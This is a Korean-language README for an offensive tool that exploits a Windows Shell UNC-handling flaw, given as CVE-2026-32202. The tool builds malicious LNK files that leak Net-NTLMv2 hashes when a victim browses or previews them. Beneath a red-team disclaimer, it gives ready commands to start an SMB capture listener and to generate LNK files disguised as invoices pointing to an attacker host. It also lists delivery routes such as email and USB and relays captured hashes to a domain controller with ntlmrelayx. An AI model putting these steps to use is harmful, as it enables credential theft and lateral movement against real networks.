
악성 LNK 파일을 생성하여 Windows Shell UNC 처리 방식을 통해 Net-NTLMv2 해시를 강제로 추출하며, 승인된 레드 팀 운영을 위한 사용자 지정 SMB 리스너 및 릴레이 통합을 제공합니다.
면책 조항
이 도구는 공인된 레드 팀 운영 및 침투 테스트 전용입니다.
명시적 허가 없이 시스템을 대상으로 한 무단 사용은 불법입니다.
사용에 따른 책임은 본인에게 있습니다. 저자는 오용이나 손상에 대해 어떠한 책임도 지지 않습니다.
설명
불완전한 Windows Shell 보호 우회(CVE-2026-32202)를 통한 NTLMv2 해시 강제 수집. 탐색기에서 열거나 미리 볼 때 SMB/UNC 인증을 강제하는 특수 제작된 LNK 파일을 생성합니다. 낮은 상호작용으로, 2026년 4월 패치가 불충분했던 패치 적용 시스템에서도 작동합니다. 실제 업무에 적극적으로 사용되고 있습니다.
주요 기능
익스플로잇이 하는 일
이 도구는 Target + IconEnvironmentDataBlock / ExtraData 구조에서 UNC 경로를 처리하는 Shell의 방식을 악용하는 정교한 .LNK 파일을 생성합니다. 피해자가 폴더를 탐색하거나 파일 위에 마우스를 올리거나 미리 보면, Windows Shell이 공격자가 제어하는 UNC로 SMB 연결을 시작하여 머신/사용자의 Net-NTLMv2 해시를 유출합니다. 대상에서 코드 실행은 없음 - 릴레이 또는 크래킹을 위한 자격 증명 강제 수집입니다.
유용한 이유
테스트 환경
의존성
설치: pip install -r requirements.txt
사용법
# 1. 캡처 서버 시작(공격자 호스트)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt
# 2. 악성 LNK 생성
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"
# 선택 사항: 안정 모드 또는 우회 모드
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"
# 3. LNK 전달(USB, 공유 폴더, 이메일 첨부, OneDrive 등)
# 4. 터미널 및 파일에서 해시 대기. 릴레이 예시:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# 또는 RBCD용 LDAP 릴레이, ADCS 인증서용 HTTP 릴레이 등
익스플로잇
제한 사항
근본 원인(요약)
LNK 아이콘/대상 해석을 위한 Windows Shell의 UNC 경로 정규화 및 ExtraData 블록 처리의 불완전한 수정. 무단 네트워크 스푸핑을 차단하기 위한 보호 메커니즘이 Shell 네임스페이스 열거 중에도 여전히 NTLM 인증을 트리거합니다.